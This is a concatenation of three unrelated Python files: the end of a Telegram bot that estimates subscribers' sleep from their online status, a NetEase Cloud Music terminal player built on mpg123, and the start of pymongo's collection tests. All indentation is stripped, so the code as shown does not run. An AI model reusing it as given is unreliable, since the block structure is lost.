uid = msg['from']['id']
if uid not in USER_CACHE:
sendmsg(_('Please first /subscribe.'), chatid, replyid)
return
if uid:
usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
usertime = datetime.datetime.now(usertz)
lastseen = user_last_seen(USER_CACHE[uid])
if lastseen:
userseendelta = usertime - datetime.datetime.fromtimestamp(
lastseen, usertz)
else:
userseendelta = None
text = [_('%s: local time is %s (%s)') % (
getufname(USER_CACHE[uid]), usertime.strftime('%H:%M'),
USER_CACHE[uid]['timezone'])]
if USER_CACHE[uid]['subscribed']:
start, interval, complete = user_status_update(uid)
if uid != msg['from']['id'] and userseendelta:
ndelta = humanizetime.naturaldelta(userseendelta)
if ndelta in (_("a moment"), _("now")):
text.append(_('Online'))
else:
text.append(_('Last seen: %s ago') % ndelta)
cutstart, cutend = CFG['cutwindow']
cutmid = (cutstart + cutend) / 2
if start:
userstart = datetime.datetime.fromtimestamp(start, usertz)
if interval:
end = userstart + datetime.timedelta(seconds=interval)
# 0 3 6
# +===========+
# | ---+-----+--x
# ^start ^end ^now
# sure
# | ----+---x |
# ^start ^end+now
# we are not sure, so don't write the db
if interval and (complete or midnight_delta(end) > cutmid):
text.append(_('Last sleep: %s, %s→%s') % (
hour_minutes(interval, False),
userstart.strftime('%H:%M'), end.strftime('%H:%M')))
# | | | and is current user
# ^now
elif (uid == msg['from']['id'] and
cutstart < midnight_delta(usertime) < cutmid):
text.append(_('Go to sleep!'))
# | x | |
# ^start ^now
# ^s ^now
else:
text.append(_('Sleep: %s→💤') % userstart.strftime('%H:%M'))
else:
text.append(_('Not enough data.'))
else:
text.append(_('Not subscribed.'))
sendmsg('\n'.join(text), chatid, replyid)
else:
update_group_members(msg['chat'])
text = []
startsum = intrvsum = 0
validstartcount = validintervcount = 0
for uid, start, interval in group_status_update(msg['chat']):
if not start:
continue
dispname = getufname(USER_CACHE[uid])
usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
userstart = datetime.datetime.fromtimestamp(start, usertz)
startsum += midnight_delta(userstart)
validstartcount += 1
if interval:
end = userstart + datetime.timedelta(seconds=interval)
text.append('%s: %s, %s→%s' % (dispname,
hour_minutes(interval, False),
userstart.strftime('%H:%M'), end.strftime('%H:%M')))
intrvsum += interval
validintervcount += 1
else:
text.append('%s: %s→💤' % (dispname, userstart.strftime('%H:%M')))
if validintervcount:
avgstart = startsum/validstartcount
avginterval = intrvsum/validintervcount
text.append(_('Average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
sendmsg('\n'.join(text) or _('Not enough data.'), chatid, replyid)
def user_average_sleep(usertz, iterable):
startsum = intrvsum = 0
count = 0
for start, duration in iterable:
userstart = datetime.datetime.fromtimestamp(start, usertz)
startsum += midnight_delta(userstart)
intrvsum += duration
count += 1
if count:
avgstart = startsum/count
avginterval = intrvsum/count
return (avgstart, avginterval)
else:
return (None, None)
def group_average_sleep(uid=None, fulllist=False):
_self_cache = group_average_sleep.cache
_cache_ttl = 600
if fulllist:
stats = []
else:
try:
timestamp, avgstart, avginterval = _self_cache[uid]
if time.time() - timestamp < _cache_ttl:
return avgstart, avginterval
except KeyError:
pass
startsum = intrvsum = 0
count = 0
if uid:
result = CONN.execute(
'SELECT sleep.user, sleep.time, sleep.duration FROM sleep'
' INNER JOIN users ON sleep.user = users.id'
' INNER JOIN user_chats ON sleep.user = user_chats.user'
' WHERE user_chats.chat = ? AND users.subscribed = 1'
' ORDER BY sleep.user', (uid,))
else:
result = CONN.execute(
'SELECT sleep.user, sleep.time, sleep.duration FROM sleep'
' INNER JOIN users ON sleep.user = users.id'
' WHERE users.subscribed = 1 ORDER BY sleep.user')
for user, group in itertools.groupby(result, key=operator.itemgetter(0)):
usertz = pytz.timezone(USER_CACHE[user]['timezone'])
avgstart, avginterval = user_average_sleep(usertz,
map(operator.itemgetter(1, 2), group))
if fulllist:
stats.append((avginterval, avgstart, getufname(USER_CACHE[user])))
count += 1
startsum += avgstart
intrvsum += avginterval
avgstart = avginterval = None
if count:
avgstart = startsum/count
avginterval = intrvsum/count
if fulllist:
return stats, avgstart, avginterval
else:
_self_cache[uid] = (time.time(), avgstart, avginterval)
return avgstart, avginterval
group_average_sleep.cache = {}
def cmd_average(expr, chatid, replyid, msg):
'''/average - List statistics about sleep time'''
if expr == 'all' and chatid < 0:
uid = None
else:
uid = msg['from']['id']
if uid not in USER_CACHE:
sendmsg(_('Please first /subscribe.'), chatid, replyid)
return
text = []
if uid:
usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
avgstart, avginterval = user_average_sleep(usertz, CONN.execute(
'SELECT time, duration FROM sleep WHERE user = ?', (uid,)))
if avgstart is not None:
text.append(_('Average: %s, %s→%s') % (hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
text.append(_('Not enough data.'))
if chatid > 0:
avgstart, avginterval = group_average_sleep(None)
if avgstart and avginterval:
text.append(_('Global average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
avgstart, avginterval = group_average_sleep(msg['chat']['id'])
if avgstart and avginterval:
text.append(_('Group average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
update_group_members(msg['chat'])
uid = msg['chat']['id']
stats, avgstart, avginterval = group_average_sleep(uid, True)
if stats:
stats.sort(key=lambda x: (-x[0], x[1], x[2]))
for interval, start, dispname in stats:
text.append('%s: %s, %s→%s' % (dispname,
hour_minutes(interval, False),
hour_minutes(midnight_adjust(start)),
hour_minutes(midnight_adjust(start + interval))))
text.append(_('Group average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
text.append(_('Not enough data.'))
sendmsg('\n'.join(text), chatid, replyid)
def cmd_subscribe(expr, chatid, replyid, msg):
'''/subscribe - Add you to the watchlist'''
update_user(msg['from'], True)
sendmsg(_("%s, you are subscribed.") % getufname(msg['from']), chatid, replyid)
def cmd_unsubscribe(expr, chatid, replyid, msg):
'''/unsubscribe - Remove you from the watchlist'''
update_user(msg['from'], False)
sendmsg(_("%s, you are unsubscribed.") % getufname(msg['from']), chatid, replyid)
def cmd_settz(expr, chatid, replyid, msg):
'''/settz - Set your timezone'''
if expr and expr in pytz.all_timezones_set:
update_user(msg['from'], timezone=expr)
sendmsg(_("Your timezone is %s now.") % expr, chatid, replyid)
else:
try:
current = USER_CACHE[msg['from']['id']]['timezone']
except KeyError:
current = CFG['defaulttz']
sendmsg(_("Invalid timezone. Your current timezone is %s.") % current, chatid, replyid)
def cmd_time(expr, chatid, replyid, msg):
'''/time - Get time for various timezones'''
tzs = list(filter(lambda x: x in pytz.all_timezones_set, expr.split()))
if not tzs:
if chatid > 0:
tzs = [USER_CACHE[msg['from']['id']]['timezone']]
else:
tzs = [row[0] for row in CONN.execute(
'SELECT users.timezone FROM users'
' INNER JOIN user_chats ON users.id = user_chats.user'
' WHERE user_chats.chat = ? GROUP BY users.timezone'
' ORDER BY count(users.timezone) DESC, users.timezone ASC',
(msg['chat']['id'],))]
if tzs:
text = [_('The time is:')]
for tz in tzs:
usertime = datetime.datetime.now(pytz.timezone(tz))
text.append(' '.join((
'🌞' if tz_is_day(usertime, tz) else '🌜',
usertime.strftime('%H:%M'), tz
)))
sendmsg('\n'.join(text), chatid, replyid)
else:
sendmsg(_("No timezone specified."), chatid, replyid)
def cmd_start(expr, chatid, replyid, msg):
if chatid > 0:
sendmsg(_("This is Trusted Sleep Bot. It can track users' sleep habit by using Telegram online status. Send me /help for help."), chatid, replyid)
def cmd_help(expr, chatid, replyid, msg):
'''/help - Show usage'''
if expr:
if expr in COMMANDS:
h = _(COMMANDS[expr].__doc__)
if h:
sendmsg(h, chatid, replyid)
else:
sendmsg(_('Help is not available for %s') % expr, chatid, replyid)
else:
sendmsg(_('Command not found.'), chatid, replyid)
else:
sendmsg('\n'.join(_(cmd.__doc__) for cmdname, cmd in COMMANDS.items() if cmd.__doc__), chatid, replyid)
def getufname(user, maxlen=100):
name = user['first_name'] or ''
if user.get('last_name'):
name += ' ' + user['last_name']
if len(name) > maxlen:
name = name[:maxlen] + '…'
return name
def load_config():
return AttrDict(json.load(open('config.json', encoding='utf-8')))
def save_config():
json.dump(CFG, open('config.json', 'w'), sort_keys=True, indent=1)
DB.commit()
def handle_update(obj):
if "update_id" in obj:
handle_api_update(obj)
else:
handle_tg_update(obj)
def sig_exit(signum, frame):
save_config()
TGCLI.close()
logging.info('Exited upon signal %s' % signum)
# should document usage in docstrings
COMMANDS = collections.OrderedDict((
('status', cmd_status),
('average', cmd_average),
('settz', cmd_settz),
('time', cmd_time),
('subscribe', cmd_subscribe),
('unsubscribe', cmd_unsubscribe),
('help', cmd_help),
('start', cmd_start)
))
if __name__ == '__main__':
CFG = load_config()
translation = gettext.translation('tsleepd', os.path.join(
os.path.dirname(os.path.abspath(os.path.realpath(sys.argv[0] or 'locale'))),
'locale'), CFG['languages'])
translation.install(('ngettext',))
DB, CONN = None, None
MSG_Q = queue.Queue()
USER_CACHE = {}
TGCLI = tgcli.TelegramCliInterface(CFG.tgclibin)
TGCLI.ready.wait()
TGCLI.on_json = MSG_Q.put
signal.signal(signal.SIGTERM, sig_exit)
try:
USER_CACHE = init_db()
all_status_update()
updatebotinfo()
apithr = threading.Thread(target=getupdates)
apithr.daemon = True
apithr.start()
while 1:
handle_update(MSG_Q.get())
finally:
save_config()
TGCLI.close()
|
player.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
网易云音乐 Player
"""
# Let's make some noise
from __future__ import print_function, unicode_literals, division, absolute_import
import subprocess
import threading
import time
import os
import random
from future.builtins import str
# from ui import Ui
from storage import Storage
from api import NetEase
from cache import Cache
from config import Config
from utils import notify
import logger
log = logger.getLogger(__name__)
class Player(object):
MODE_ORDERED = 0
MODE_ORDERED_LOOP = 1
MODE_SINGLE_LOOP = 2
MODE_RANDOM = 3
MODE_RANDOM_LOOP = 4
def __init__(self):
self.config = Config()
# self.ui = Ui()
self.popen_handler = None
# flag stop, prevent thread start
self.playing_flag = False
self.refrese_url_flag = False
self.process_length = 0
self.process_location = 0
self.storage = Storage()
self.cache = Cache()
self.end_callback = None
self.playing_song_changed_callback = None
self.api = NetEase()
@property
def info(self):
return self.storage.database["player_info"]
@property
def songs(self):
return self.storage.database["songs"]
@property
def index(self):
return self.info["idx"]
@property
def list(self):
return self.info["player_list"]
@property
def order(self):
return self.info["playing_order"]
@property
def mode(self):
return self.info["playing_mode"]
@property
def is_ordered_mode(self):
return self.mode == Player.MODE_ORDERED
@property
def is_ordered_loop_mode(self):
return self.mode == Player.MODE_ORDERED_LOOP
@property
def is_single_loop_mode(self):
return self.mode == Player.MODE_SINGLE_LOOP
@property
def is_random_mode(self):
return self.mode == Player.MODE_RANDOM
@property
def is_random_loop_mode(self):
return self.mode == Player.MODE_RANDOM_LOOP
@property
def config_notifier(self):
return self.config.get("notifier")
@property
def config_mpg123(self):
return self.config.get("mpg123_parameters")
@property
def current_song(self):
if not self.songs:
return {}
if not self.is_index_valid:
return {}
song_id = self.list[self.index]
return self.songs.get(song_id, {})
@property
def playing_id(self):
return self.current_song["song_id"]
@property
def playing_name(self):
return self.current_song["song_name"]
@property
def is_empty(self):
return len(self.list) == 0
@property
def is_index_valid(self):
return 0 <= self.index < len(self.list)
def notify_playing(self):
if not self.current_song:
return
if not self.config_notifier:
return
song = self.current_song
notify(
"正在播放: {}\n{}-{}".format(
song["song_name"], song["artist"], song["album_name"]
)
)
def notify_copyright_issue(self):
log.warning(
"Song {} is unavailable due to copyright issue.".format(self.playing_id)
)
notify("版权限制,无法播放此歌曲")
def change_mode(self, step=1):
self.info["playing_mode"] = (self.info["playing_mode"] + step) % 5
def build_playinfo(self):
if not self.current_song:
return
# self.ui.build_playinfo(
# self.current_song["song_name"],
# self.current_song["artist"],
# self.current_song["album_name"],
# self.current_song["quality"],
# time.time(),
# pause=not self.playing_flag,
# )
def add_songs(self, songs):
for song in songs:
song_id = str(song["song_id"])
self.info["player_list"].append(song_id)
if song_id in self.songs:
self.songs[song_id].update(song)
else:
self.songs[song_id] = song
def refresh_urls(self):
songs = self.api.dig_info(self.list, "refresh_urls")
if songs:
for song in songs:
song_id = str(song["song_id"])
if song_id in self.songs:
self.songs[song_id]["mp3_url"] = song["mp3_url"]
self.songs[song_id]["expires"] = song["expires"]
self.songs[song_id]["get_time"] = song["get_time"]
else:
self.songs[song_id] = song
self.refrese_url_flag = True
def stop(self):
if not self.popen_handler:
return
self.playing_flag = False
self.popen_handler.stdin.write(b"Q\n")
self.popen_handler.stdin.flush()
self.popen_handler.kill()
self.popen_handler = None
# wait process to be killed
time.sleep(0.01)
def tune_volume(self, up=0):
if not self.popen_handler:
return
new_volume = self.info["playing_volume"] + up
if new_volume > 100:
new_volume = 100
elif new_volume < 0:
new_volume = 0
self.info["playing_volume"] = new_volume
self.popen_handler.stdin.write(
"V {}\n".format(self.info["playing_volume"]).encode()
)
self.popen_handler.stdin.flush()
def switch(self):
if not self.popen_handler:
return
self.playing_flag = not self.playing_flag
self.popen_handler.stdin.write(b"P\n")
self.popen_handler.stdin.flush()
self.build_playinfo()
def run_mpg123(self, on_exit, url, expires=-1, get_time=-1):
para = ["mpg123", "-R"] + self.config_mpg123
self.popen_handler = subprocess.Popen(
para, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
self.tune_volume()
self.popen_handler.stdin.write(b"L " + url.encode("utf-8") + b"\n")
self.popen_handler.stdin.flush()
endless_loop_cnt = 0
while True:
if not self.popen_handler:
break
strout = self.popen_handler.stdout.readline().decode("utf-8").strip()
if strout[:2] == "@F":
# playing, update progress
out = strout.split(" ")
self.process_location = int(float(out[3]))
self.process_length = int(float(out[3]) + float(out[4]))
elif strout[:2] == "@E":
self.playing_flag = True
if (
expires >= 0
and get_time >= 0
and time.time() - expires - get_time >= 0
):
# 刷新URL
self.refresh_urls()
else:
# error, stop song and move to next
self.notify_copyright_issue()
break
elif strout == "@P 0":
# end, moving to next
self.playing_flag = True
break
elif strout == "":
endless_loop_cnt += 1
# 有播放后没有退出,mpg123一直在发送空消息的情况,此处直接终止处理
if endless_loop_cnt > 100:
log.warning(
"mpg123 error, halt, endless loop and high cpu use, then we kill it"
)
break
if self.playing_flag:
if self.refrese_url_flag:
self.stop()
self.replay()
self.refrese_url_flag = False
else:
self.next()
else:
self.stop()
def download_lyric(self, is_transalted=False):
key = "lyric" if not is_transalted else "tlyric"
if key not in self.songs[str(self.playing_id)]:
self.songs[str(self.playing_id)][key] = []
if len(self.songs[str(self.playing_id)][key]) > 0:
return
if not is_transalted:
lyric = self.api.song_lyric(self.playing_id)
else:
lyric = self.api.song_tlyric(self.playing_id)
self.songs[str(self.playing_id)][key] = lyric
def download_song(self, song_id, song_name, artist, url):
def write_path(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.add(song_id, song_name, artist, url, write_path)
self.cache.start_download()
def start_playing(self, on_exit, args):
"""
Runs the given args in subprocess.Popen, and then calls the function
on_exit when the subprocess completes.
on_exit is a callable object, and args is a lists/tuple of args
that would give to subprocess.Popen.
"""
# log.debug("%s,%s,%s" % (args['song_id'], args['song_name'], args['mp3_url']))
if "cache" in args.keys() and os.path.isfile(args["cache"]):
thread = threading.Thread(
target=self.run_mpg123, args=(on_exit, args["cache"])
)
else:
new_url = NetEase().songs_url([args["song_id"]])[0]["url"] #使用新地址
if not new_url: #如果没有获得新地址
new_url = args["mp3_url"] #使用老地址传给mpg123
thread = threading.Thread(
target=self.run_mpg123,
args=(on_exit, new_url, args["expires"], args["get_time"]),
)
cache_thread = threading.Thread(
target=self.download_song,
args=(
args["song_id"],
args["song_name"],
args["artist"],
args["mp3_url"],
),
)
cache_thread.start()
thread.start()
lyric_download_thread = threading.Thread(target=self.download_lyric)
lyric_download_thread.start()
tlyric_download_thread = threading.Thread(
target=self.download_lyric, args=(True,)
)
tlyric_download_thread.start()
# returns immediately after the thread starts
return thread
def replay(self):
if not self.is_index_valid:
self.stop()
if self.end_callback:
log.debug("Callback")
self.end_callback()
return
if not self.current_song:
return
self.stop()
self.playing_flag = True
self.build_playinfo()
self.notify_playing()
self.start_playing(lambda: 0, self.current_song)
def shuffle_order(self):
del self.order[:]
self.order.extend(list(range(0, len(self.list))))
random.shuffle(self.order)
self.info["random_index"] = 0
def new_player_list(self, type, title, datalist, offset):
self.info["player_list_type"] = type
self.info["player_list_title"] = title
# self.info['idx'] = offset
self.info["player_list"] = []
self.info["playing_order"] = []
self.info["random_index"] = 0
self.songs.clear()
self.add_songs(datalist)
def append_songs(self, datalist):
self.add_songs(datalist)
# switch_flag为true表示:
# 在播放列表中 || 当前所在列表类型不在"songs"、"djchannels"、"fmsongs"中
def play_or_pause(self, idx, switch_flag):
if self.is_empty:
return
# print('flag:',switch_flag)
# if same "list index" and "playing index" --> same song :: pause/resume it
if self.index == idx and switch_flag:
if not self.popen_handler:
# print('aaaaaa')
self.stop()
self.replay()
else:
# print('bbbbbb')
self.switch()
else:
# print('cccccccc')
self.info["idx"] = idx
self.stop()
self.replay()
def _swap_song(self):
now_songs = self.order.index(self.index)
self.order[0], self.order[now_songs] = self.order[now_songs], self.order[0]
def _need_to_shuffle(self):
playing_order = self.order
random_index = self.info["random_index"]
if (
random_index >= len(playing_order)
or playing_order[random_index] != self.index
):
return True
else:
return False
def next_idx(self):
if not self.is_index_valid:
return self.stop()
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
# make sure self.index will not over
if self.info["idx"] < playlist_len:
self.info["idx"] += 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.index + 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info["idx"] = self.info["idx"]
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
# When you regenerate playing list
# you should keep previous song same.
self._swap_song()
playing_order_len = len(self.order)
self.info["random_index"] += 1
# Out of border
if self.mode == Player.MODE_RANDOM_LOOP:
self.info["random_index"] %= playing_order_len
# Random but not loop, out of border, stop playing.
if self.info["random_index"] >= playing_order_len:
self.info["idx"] = playlist_len
else:
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def next(self):
self.stop()
self.next_idx()
self.replay()
def prev_idx(self):
if not self.is_index_valid:
self.stop()
return
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
if self.info["idx"] > 0:
self.info["idx"] -= 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.info["idx"] - 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info["idx"] = self.info["idx"]
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
playing_order_len = len(self.order)
self.info["random_index"] -= 1
if self.info["random_index"] < 0:
if self.mode == Player.MODE_RANDOM:
self.info["random_index"] = 0
else:
self.info["random_index"] %= playing_order_len
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def prev(self):
self.stop()
self.prev_idx()
self.replay()
def shuffle(self):
self.stop()
self.info["playing_mode"] = Player.MODE_RANDOM
self.shuffle_order()
self.info["idx"] = self.info["playing_order"][self.info["random_index"]]
self.replay()
def volume_up(self):
self.tune_volume(5)
def volume_down(self):
self.tune_volume(-5)
def update_size(self):
self.ui.update_size()
self.build_playinfo()
def cache_song(self, song_id, song_name, artist, song_url):
def on_exit(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.enable = False
self.cache.enable = True
self.cache.add(song_id, song_name, artist, song_url, on_exit)
self.cache.start_download()
|
test_collection.py
|
# -*- coding: utf-8 -*-
# Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the collection module."""
import contextlib
import re
import sys
import threading
from collections import defaultdict
sys.path[0:0] = [""]
import bson
from bson.raw_bson import RawBSONDocument
from bson.regex import Regex
from bson.code import Code
from bson.codec_options import CodecOptions
from bson.objectid import ObjectId
from bson.py3compat import itervalues
from bson.son import SON
from pymongo import (ASCENDING, DESCENDING, GEO2D,
GEOHAYSTACK, GEOSPHERE, HASHED, TEXT)
from pymongo import monitoring
from pymongo.bulk import BulkWriteError
from pymongo.collection import Collection, ReturnDocument
from pymongo.command_cursor import CommandCursor
from pymongo.cursor import CursorType
from pymongo.errors import (DocumentTooLarge,
DuplicateKeyError,
ExecutionTimeout,
InvalidDocument,
InvalidName,
InvalidOperation,
OperationFailure,
WriteConcernError)
from pymongo.message import _COMMAND_OVERHEAD, _gen_find_command
from pymongo.mongo_client import MongoClient
from pymongo.operations import *
from pymongo.read_preferences import ReadPreference
from pymongo.results import (InsertOneResult,
InsertManyResult,
UpdateResult,
DeleteResult)
from pymongo.write_concern import WriteConcern
from test.test_client import IntegrationTest
from test.utils import (is_mongos, enable_text_search, get_pool,
rs_or_single_client, single_client,
wait_until, EventListener,
IMPOSSIBLE_WRITE_CONCERN)
from test import client_context, unittest
class TestCollectionNoConnect(unittest.TestCase):
"""Test Collection features on a client that does not connect.
"""
@classmethod
def setUpClass(cls):
cls.db = MongoClient(connect=False).pymongo_test
def test_collection(self):
self.assertRaises(TypeError, Collection, self.db, 5)
def make_col(base, name):
return base[name]
self.assertRaises(InvalidName, make_col, self.db, "")
self.assertRaises(InvalidName, make_col, self.db, "te$t")
self.assertRaises(InvalidName, make_col, self.db, ".test")
self.assertRaises(InvalidName, make_col, self.db, "test.")
self.assertRaises(InvalidName, make_col, self.db, "tes..t")
self.assertRaises(InvalidName, make_col, self.db.test, "")
self.assertRaises(InvalidName, make_col, self.db.test, "te$t")
self.assertRaises(InvalidName, make_col, self.db.test, ".test")
self.assertRaises(InvalidName, make_col, self.db.test, "test.")
self.assertRaises(InvalidName, make_col, self.db.test, "tes..t")
self.assertRaises(InvalidName, make_col, self.db.test, "tes\x00t")
def test_getattr(self):
coll = self.db.test
self.assertTrue(isinstance(coll['_does_not_exist'], Collection))
with self.assertRaises(AttributeError) as context:
coll._does_not_exist
# Message should be:
# "AttributeError: Collection has no attribute '_does_not_exist'. To
# access the test._does_not_exist collection, use
# database['test._does_not_exist']."
self.assertIn("has no attribute '_does_not_exist'",
str(context.exception))
def test_iteration(self):
self.assertRaises(TypeError, next, self.db)
class TestCollection(IntegrationTest):
@classmethod
def setUpClass(cls):
super(TestCollection, cls).setUpClass()
cls.w = client_context.w
@classmethod
def tearDownClass(cls):
cls.db.drop_collection("test_large_limit")
@contextlib.contextmanager
def write_concern_collection(self):
if client_context.version.at_least(3, 3, 9) and client_context.is_rs:
with self.assertRaises(WriteConcernError):
# Unsatisfiable write concern.
yield Collection(
self.db, 'test',
write_concern=WriteConcern(w=len(client_context.nodes) + 1))
else:
yield self.db.test
def test_equality(self):
self.assertTrue(isinstance(self.db.test, Collection))
self.assertEqual(self.db.test, self.db["test"])
self.assertEqual(self.db.test, Collection(self.db, "test"))
self.assertEqual(self.db.test.mike, self.db["test.mike"])
self.assertEqual(self.db.test["mike"], self.db["test.mike"])
@client_context.require_version_min(3, 3, 9)
def test_create(self):
# No Exception.
db = client_context.client.pymongo_test
db.create_test_no_wc.drop()
Collection(db, name='create_test_no_wc', create=True)
with self.assertRaises(OperationFailure):
Collection(
db, name='create-test-wc',
write_concern=IMPOSSIBLE_WRITE_CONCERN,
create=True)
def test_drop_nonexistent_collection(self):
self.db.drop_collection('test')
self.assertFalse('test' in self.db.collection_names())
# No exception
self.db.drop_collection('test')
@client_context.require_version_min(2, 6)
def test_create_indexes(self):
db = self.db
self.assertRaises(TypeError, db.test.create_indexes, 'foo')
self.assertRaises(TypeError, db.test.create_indexes, ['foo'])
self.assertRaises(TypeError, IndexModel, 5)
self.assertRaises(ValueError, IndexModel, [])
db.test.drop_indexes()
db.test.insert_one({})
self.assertEqual(len(db.test.index_information()), 1)
db.test.create_indexes([IndexModel("hello")])
db.test.create_indexes([IndexModel([("hello", DESCENDING),
("world", ASCENDING)])])
# Tuple instead of list.
db.test.create_indexes([IndexModel((("world", ASCENDING),))])
self.assertEqual(len(db.test.index_information()), 4)
db.test.drop_indexes()
names = db.test.create_indexes([IndexModel([("hello", DESCENDING),
("world", ASCENDING)],
name="hello_world")])
self.assertEqual(names, ["hello_world"])
db.test.drop_indexes()
self.assertEqual(len(db.test.index_information()), 1)
db.test.create_indexes([IndexModel("hello")])
self.assertTrue("hello_1" in db.test.index_information())
db.test.drop_indexes()
self.assertEqual(len(db.test.index_information()), 1)
names = db.test.create_indexes([IndexModel([("hello", DESCENDING),
("world", ASCENDING)]),
IndexModel("hello")])
info = db.test.index_information()
for name in names:
self.assertTrue(name in info)
db.test.drop()
db.test.insert_one({'a': 1})
db.test.insert_one({'a': 1})
self.assertRaises(
DuplicateKeyError,
db.test.create_indexes,
[IndexModel('a', unique=True)])
with self.write_concern_collection() as coll:
coll.create_indexes([IndexModel('hello')])
def test_create_index(self):
db = self.db
self.assertRaises(TypeError, db.test.create_index, 5)
self.assertRaises(TypeError, db.test.create_index, {"hello": 1})
self.assertRaises(ValueError, db.test.create_index, [])
db.test.drop_indexes()
db.test.insert_one({})
self.assertEqual(len(db.test.index_information()), 1)
db.test.create_index("hello")
db.test.create_index([("hello", DESCENDING), ("world", ASCENDING)])
# Tuple instead of list.
db.test.create_index((("world", ASCENDING),))
self.assertEqual(len(db.test.index_information()), 4)
db.test.drop_indexes()
ix = db.test.create_index([("hello", DESCENDING),
("world", ASCENDING)], name="hello_world")
self.assertEqual(ix, "hello_world")
db.test.drop_indexes()
self.assertEqual(len(db.test.index_information()), 1)
db.test.create_index("hello")
self.assertTrue("hello_1" in db.test.index_information())
db.test.drop_indexes()
self.assertEqual(len(db.test.index_information()), 1)
db.test.create_index([("hello", DESCENDING), ("world", ASCENDING)])
self.assertTrue("hello_-1_world_1" in db.test.index_information())
db.test.drop()
db.test.insert_one({'a': 1})
db.test.insert_one({'a': 1})
self.assertRaises(
DuplicateKeyError, db.test.create_index, 'a', unique=True)
with self.write_concern_collection() as coll:
coll.create_index([('hello', DESCENDING)])
def test_drop_index(self):
db = self.db
db.test.drop_indexes()
db.test.create_index("hello")
name = db.test.create_index("goodbye")
self.assertEqual(len(db.test.index_information()), 3)
self.assertEqual(name, "goodbye_1")
db.test.drop_index(name)
# Drop it again.
with self.assertRaises(OperationFailure):
db.test.drop_index(name)
self.assertEqual(len(db.test.index_information()), 2)
self.assertTrue("hello_1" in db.test.index_information())
db.test.drop_indexes()
db.test.create_index("hello")
name = db.test.create_index("goodbye")
self.assertEqual(len(db.test.index_information()), 3)
self.assertEqual(name, "goodbye_1")
db.test.drop_index([("goodbye", ASCENDING)])
self.assertEqual(len(db.test.index_information()), 2)
self.assertTrue("hello_1" in db.test.index_information())
with self.write_concern_collection() as coll:
coll.drop_index('hello_1')
def test_reindex(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({"foo": "bar", "who": "what", "when": "how"})
db.test.create_index("foo")
db.test.create_index("who")
db.test.create_index("when")
info = db.test.index_information()
def check_result(result):
self.assertEqual(4, result['nIndexes'])
indexes = result['indexes']
names = [idx['name'] for idx in indexes]
for name in names:
self.assertTrue(name in info)
for key in info:
self.assertTrue(key in names)
reindexed = db.test.reindex()
if 'raw' in reindexed:
# mongos
for result in itervalues(reindexed['raw']):
check_result(result)
else:
check_result(reindexed)
with self.write_concern_collection() as coll:
coll.reindex()
def test_list_indexes(self):
db = self.db
db.test.drop()
db.test.insert_one({}) # create collection
def map_indexes(indexes):
return dict([(index["name"], index) for index in indexes])
indexes = list(db.test.list_indexes())
self.assertEqual(len(indexes), 1)
self.assertTrue("_id_" in map_indexes(indexes))
db.test.create_index("hello")
indexes = list(db.test.list_indexes())
self.assertEqual(len(indexes), 2)
self.assertEqual(map_indexes(indexes)["hello_1"]["key"],
SON([("hello", ASCENDING)]))
db.test.create_index([("hello", DESCENDING), ("world", ASCENDING)],
unique=True)
indexes = list(db.test.list_indexes())
self.assertEqual(len(indexes), 3)
index_map = map_indexes(indexes)
self.assertEqual(index_map["hello_-1_world_1"]["key"],
SON([("hello", DESCENDING), ("world", ASCENDING)]))
self.assertEqual(True, index_map["hello_-1_world_1"]["unique"])
def test_index_info(self):
db = self.db
db.test.drop()
db.test.insert_one({}) # create collection
self.assertEqual(len(db.test.index_information()), 1)
self.assertTrue("_id_" in db.test.index_information())
db.test.create_index("hello")
self.assertEqual(len(db.test.index_information()), 2)
self.assertEqual(db.test.index_information()["hello_1"]["key"],
[("hello", ASCENDING)])
db.test.create_index([("hello", DESCENDING), ("world", ASCENDING)],
unique=True)
self.assertEqual(db.test.index_information()["hello_1"]["key"],
[("hello", ASCENDING)])
self.assertEqual(len(db.test.index_information()), 3)
self.assertEqual([("hello", DESCENDING), ("world", ASCENDING)],
db.test.index_information()["hello_-1_world_1"]["key"]
)
self.assertEqual(
True, db.test.index_information()["hello_-1_world_1"]["unique"])
def test_index_geo2d(self):
db = self.db
db.test.drop_indexes()
